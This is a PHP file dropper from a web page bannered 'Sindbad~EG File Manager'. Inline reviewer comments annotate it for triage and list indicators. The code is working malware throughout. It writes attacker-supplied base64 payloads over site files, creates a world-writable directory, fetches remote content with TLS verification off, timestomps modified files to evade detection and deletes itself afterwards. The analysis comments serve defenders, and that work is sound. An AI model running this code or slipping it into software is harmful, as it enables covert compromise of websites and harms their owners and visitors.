Sindbad~EG File Manager
<?php
// NOTE(review): this top-level run is a file dropper, not application code. It reads a JSON
// body from php://input, writes a base64-decoded payload (the "logger" key) over files under the
// site root, reports what it touched, and then deletes itself (line with unlink(__FILE__)).
// The comments below describe what the visible code does so the sample can be triaged; nothing
// here is a recommended pattern.
$input = file_get_contents('php://input');
// json_decode failure yields null; the offset reads below then simply see empty values.
$data = json_decode($input, true);
// Gate: without a truthy "up" key the script answers a fixed marker and stops.
// The literal response 'ok_sp3' is a usable indicator that this script is being probed.
if (empty($data['up'])) {
echo 'ok_sp3';
exit();
}
// Scheme/host are derived from the request, but $domain is never used in this block.
$protocol = (
(!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off')
|| $_SERVER['SERVER_PORT'] == 443
) ? 'https://' : 'http://';
$domain = $protocol . $_SERVER['HTTP_HOST'];
// "pathsForced": request-supplied paths that are appended verbatim to the site root (no
// normalisation) and only reported/overwritten when they already exist.
$shouldExist = [];
if (!empty($data['pathsForced'])) {
$shouldExist = $data['pathsForced'];
}
// "pathsCreate": request-supplied paths that are written whether or not they exist, but only
// if at least one forced path existed (see the count($existPaths) guard further down).
$createIfnot = [];
if (!empty($data['pathsCreate'])) {
$createIfnot = $data['pathsCreate'];
}
// Loose comparison: any truthy JSON value (1, "1", true, a non-empty string) enables writing.
$replace = isset($data['replace']) && $data['replace']==true;
// Payload to write, base64 in the request; decoded without strict mode, so malformed input
// silently produces partial bytes rather than an error.
$logger = '';
if (!empty($data['logger'])) {
$logger = base64_decode($data['logger']);
}
$r=getSiteRoot();
// Removes a previous <siteroot>/errirs.txt, making it owner-writable first via chFile(..., true).
// Presence (or recent deletion) of this file name is a triage hint for this sample.
$log = $r.'/errirs.txt';
if (file_exists($log)) {
chFile($log,true);
unlink($log);
}
// Always true at this point: the empty($data['up']) check above already exited otherwise.
if (!empty($data['up'])){
$existPaths = [];
$injected = [];
// Phase 1: for each forced path, record it if present; when replace+payload are set, loosen
// permissions (chFile(..., true) => chown to the current user, chmod 0755) and overwrite it.
foreach ($shouldExist as $pathExist) {
$path = $r .$pathExist;
if (file_exists($path)){
// str_replace, not a prefix strip: every occurrence of the root string is removed from the
// reported path, so the echoed list is only approximately site-relative.
$existPaths[] = str_replace($r, '',$path);
if($replace && $logger){
chFile($path,true);
// file_put_contents returns the byte count; an empty payload (0) would not be reported.
if(file_put_contents($path,$logger)){
$injected[] = str_replace($r, '',$path);
}
}
}
}
// Phase 2 runs only if at least one forced path existed. It creates <siteroot>/images with mode
// 0777 (before umask) regardless of whether any create path points there — a world-writable
// directory under the web root is a strong indicator on its own — then writes the payload to
// each "create" path. file_put_contents does not create missing parent directories, so paths in
// non-existent subdirectories silently fail and are not reported.
if($replace && count($existPaths)>0 && $logger){
$pathImages = $r . '/images';
if(!is_dir($pathImages)){
mkdir($pathImages, 0777, true);
}
foreach ($createIfnot as $pathExist) {
$path = $r .$pathExist;
// Redundant re-check of the outer condition; chFile returns false for a not-yet-existing file.
if($replace && $logger){
chFile($path,true);
if(file_put_contents($path,$logger)){
$injected[] = str_replace($r, '',$path);
}
}
}
}
// Reports touched files, then removes this script from disk. After one successful run the
// dropper itself is gone; the written files (and any images/ directory) are what remains to find.
echo json_encode(['exist'=>$existPaths,'injected'=>$injected]);
unlink(__FILE__);
}
/**
 * Changes owner and mode of an existing file.
 *
 * With $open truthy the file is chowned to the running process's user — resolved via
 * posix_getpwuid(posix_geteuid()), then get_current_user(), then the literal 'www-data' — and
 * chmod'ed 0755 (owner-writable). Otherwise it is chowned to 'root' and chmod'ed 0555
 * (read/execute only). Both calls are @-suppressed, so failures are silent. NOTE(review):
 * changing a file's owner typically requires elevated privileges, so $chownOk is presumably
 * false on a normal web-server account and the function then returns false even when the chmod
 * took effect; every caller in this file ignores the return value anyway.
 *
 * @param string $file path to an existing file; a missing file returns false immediately
 * @param bool   $open true => make writable (0755, current user); false => lock down (0555, root)
 * @return bool  true only when both chown and chmod reported success
 */
function chFile($file, $open) {
if (!file_exists($file)) {
return false;
}
$chmodOk = true;
$chownOk = true;
if ($open) {
if (function_exists('posix_getpwuid')) {
$user = posix_getpwuid(posix_geteuid())['name'];
} elseif (function_exists('get_current_user')) {
$user = get_current_user();
} else {
$user = 'www-data';
}
$chownOk = @chown($file, $user);
$chmodOk = @chmod($file, 0755);
} else {
$user = 'root';
$chownOk = @chown($file, $user);
$chmodOk = @chmod($file, 0555);
}
return $chownOk && $chmodOk;
}
/**
 * Best-effort site root.
 *
 * Uses DOCUMENT_ROOT (resolved with realpath) when the server provides one. Otherwise it
 * starts at this file's directory and walks up one level per path segment of REQUEST_URI,
 * i.e. it assumes the script sits at the depth the URL suggests. Note that an empty URI path
 * still counts as one segment (explode on '' yields one element), so at least one dirname()
 * is always applied in the fallback.
 *
 * @return string|false the resolved directory, or false if realpath() fails
 */
function getSiteRoot(){
$docRoot = $_SERVER['DOCUMENT_ROOT'] ?? null;
if ($docRoot) {
return realpath($docRoot);
}
$uriPath = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
$segments = explode('/', trim($uriPath, '/'));
$dir = realpath(__DIR__);
foreach ($segments as $_segment) {
$dir = dirname($dir);
}
return $dir;
}
/**
 * Fetches a URL body, trying four transports in turn and returning the first that yields data.
 *
 * 1. file_get_contents() with a stream context — TLS peer and hostname verification are
 *    disabled (verify_peer / verify_peer_name false), so any on-path party can serve the
 *    response.
 * 2. cURL, also with verification disabled (SSL_VERIFYPEER false, SSL_VERIFYHOST 0) and
 *    redirects followed. CURLOPT_ENCODING '' asks cURL to negotiate compression, which is at
 *    odds with the explicit "Accept-Encoding: identity" header sent alongside it.
 * 3. fopen() on the same context, only if allow_url_fopen is enabled.
 * 4. A raw socket GET (fsockopen, ssl:// for https) that returns everything after the first
 *    blank line of the response. No status code is checked and, because the request is
 *    HTTP/1.1, a chunked-encoded body is presumably returned with its chunk framing intact.
 *
 * NOTE(review): no caller of this function is visible on the page; in a dropper of this kind it
 * would plausibly be used to retrieve further content, but that is not shown here. The fixed
 * Chrome-like User-Agent combined with "Accept-Encoding: identity" on an outbound request from
 * a web-server process is a reasonable egress-log indicator for this sample.
 *
 * @param string $url     absolute URL to fetch
 * @param int    $timeout seconds, applied to every transport
 * @return string|false   response body, or false when every transport failed
 */
function getContent($url, $timeout = 40)
{
$ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36';
$headers =
"User-Agent: $ua\r\n" .
"Accept: */*\r\n" .
"Accept-Language: en-US,en;q=0.9\r\n" .
"Accept-Encoding: identity\r\n";
$ctx = stream_context_create(array(
'http' => array(
'timeout' => $timeout,
'header' => $headers
),
'ssl' => array(
'verify_peer' => false,
'verify_peer_name' => false,
)
));
// Transport 1: stream wrapper. Warnings are suppressed; failure is only visible as false.
$data = @file_get_contents($url, false, $ctx);
if ($data !== false) return $data;
// Transport 2: cURL, if the extension is loaded.
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt_array($ch, array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_CONNECTTIMEOUT => $timeout,
CURLOPT_TIMEOUT => $timeout,
CURLOPT_USERAGENT => $ua,
CURLOPT_ENCODING => '',
CURLOPT_HTTPHEADER =>array(
'Accept: */*',
'Accept-Language: en-US,en;q=0.9',
'Accept-Encoding: identity'
),
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => 0
));
$data = curl_exec($ch);
curl_close($ch);
if ($data !== false) return $data;
}
// Transport 3: fopen on the same context. Uses the same wrapper as transport 1, so it
// presumably only helps when file_get_contents itself was disabled rather than the wrapper.
if (ini_get('allow_url_fopen')) {
$fp = @fopen($url, 'rb', false, $ctx);
if ($fp) {
$data = stream_get_contents($fp);
fclose($fp);
if ($data !== false) return $data;
}
}
// Transport 4: hand-written HTTP over a socket. Port is fixed to 443/80 by scheme; any
// explicit port in the URL is ignored. $e/$s receive fsockopen's errno/errstr and are unused.
$p = parse_url($url);
if (!empty($p['host'])) {
$scheme = (isset($p['scheme']) ? $p['scheme'] : 'http') === 'https' ? 'ssl' : 'tcp';
$port = (isset($p['scheme']) && $p['scheme'] === 'https') ? 443 : 80;
$host = $p['host'];
$path = (isset($p['path']) ? $p['path'] : '/') . (isset($p['query']) ? '?' . $p['query'] : '');
$fp = @fsockopen("$scheme://$host", $port, $e, $s, $timeout);
if ($fp) {
fwrite($fp,
"GET $path HTTP/1.1\r\n" .
"Host: $host\r\n" .
$headers .
"Connection: close\r\n\r\n"
);
$resp = stream_get_contents($fp);
fclose($fp);
// Body = everything after the first CRLFCRLF; headers and status line are discarded unread.
if ($resp && ($pos = strpos($resp, "\r\n\r\n")) !== false) {
return substr($resp, $pos + 4);
}
}
}
return false;
}
/**
 * Writes $source to $path, trying four write mechanisms in turn, and hides the modification
 * of an existing file by restoring its original mtime and locking its mode to 0555.
 *
 * Behaviour visible in the code:
 * - The parent directory is created (0755, recursive) if missing; the result is not checked.
 * - If the file already exists, its mtime is captured up front; a non-writable file is
 *   chmod'ed 0644 and the call gives up (false) if that does not make it writable.
 * - After any successful write to a pre-existing file, touch() resets atime/mtime to the
 *   captured value and chmod() sets 0555. NOTE(review): this is timestomping — mtime-based
 *   triage ("recently modified files") will not surface the change. On POSIX filesystems the
 *   inode change time (ctime) is presumably still updated by touch/chmod, so "mode 0555 with a
 *   ctime much newer than mtime" is a practical hunting query for files written by this sample.
 *   Newly created files are left with the default mode and a current mtime.
 * - Fallbacks 2–4 (fopen/fwrite, SplFileObject, php://temp + stream_copy_to_stream) all open
 *   the same path for writing; they are only reached when file_put_contents failed, so they
 *   rarely succeed where it did not. SplFileObject open failures throw RuntimeException, which
 *   the generic catch (Exception) swallows.
 *
 * @param string $path   destination file
 * @param string $source bytes to write
 * @return bool true on the first successful write; false when every mechanism failed
 */
function saveContent($path, $source){
$dir = dirname($path);
if (!is_dir($dir)) {
@mkdir($dir, 0755, true);
}
$fileExistPath = file_exists($path);
if ($fileExistPath){
// Capture the pre-write mtime so it can be restored after writing (see note above).
$stat = stat($path);
$originalMTime = $stat['mtime'];
if (!is_writable($path)) {
@chmod($path, 0644);
if (!is_writable($path)) return false;
}
}
// Mechanism 1: file_put_contents. A successful write returns the byte count (0 is a success).
if (@file_put_contents($path, $source) !== false) {
if ($fileExistPath){
@touch($path, $originalMTime, $originalMTime);
@chmod($path, 0555);
}
return true;
}
// Mechanism 2: explicit fopen/fwrite.
$fp = @fopen($path, 'wb');
if ($fp) {
$written = @fwrite($fp, $source);
fclose($fp);
if ($written !== false) {
if ($fileExistPath){
@touch($path, $originalMTime, $originalMTime);
@chmod($path, 0555);
}
return true;
}
}
// Mechanism 3: SplFileObject; open errors surface as exceptions and are ignored.
try {
$file = new SplFileObject($path, 'wb');
$bytes = $file->fwrite($source);
if ($bytes !== false) {
if ($fileExistPath){
@touch($path, $originalMTime, $originalMTime);
@chmod($path, 0555);
}
return true;
}
} catch (Exception $e) {
// skip
}
// Mechanism 4: stage in php://temp, then stream-copy into the destination.
// The copy's return value is not checked, so a partial copy is still reported as success.
$temp = @fopen('php://temp', 'r+');
if ($temp) {
fwrite($temp, $source);
rewind($temp);
$dest = @fopen($path, 'wb');
if ($dest) {
stream_copy_to_stream($temp, $dest);
fclose($dest);
fclose($temp);
if ($fileExistPath){
@touch($path, $originalMTime, $originalMTime);
@chmod($path, 0555);
}
return true;
}
fclose($temp);
}
return false;
}
/**
 * Builds a string of $length characters drawn with random_int() from [0-9a-zA-Z].
 *
 * A non-positive $length yields ''. Uses the CSPRNG-backed random_int, so the
 * output is suitable wherever unpredictability matters.
 *
 * @param int $length number of characters to produce
 * @return string
 */
function random_string($length = 6) {
$alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$lastIndex = strlen($alphabet) - 1;
$out = '';
while (strlen($out) < $length) {
$out .= $alphabet[random_int(0, $lastIndex)];
}
return $out;
}
?>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists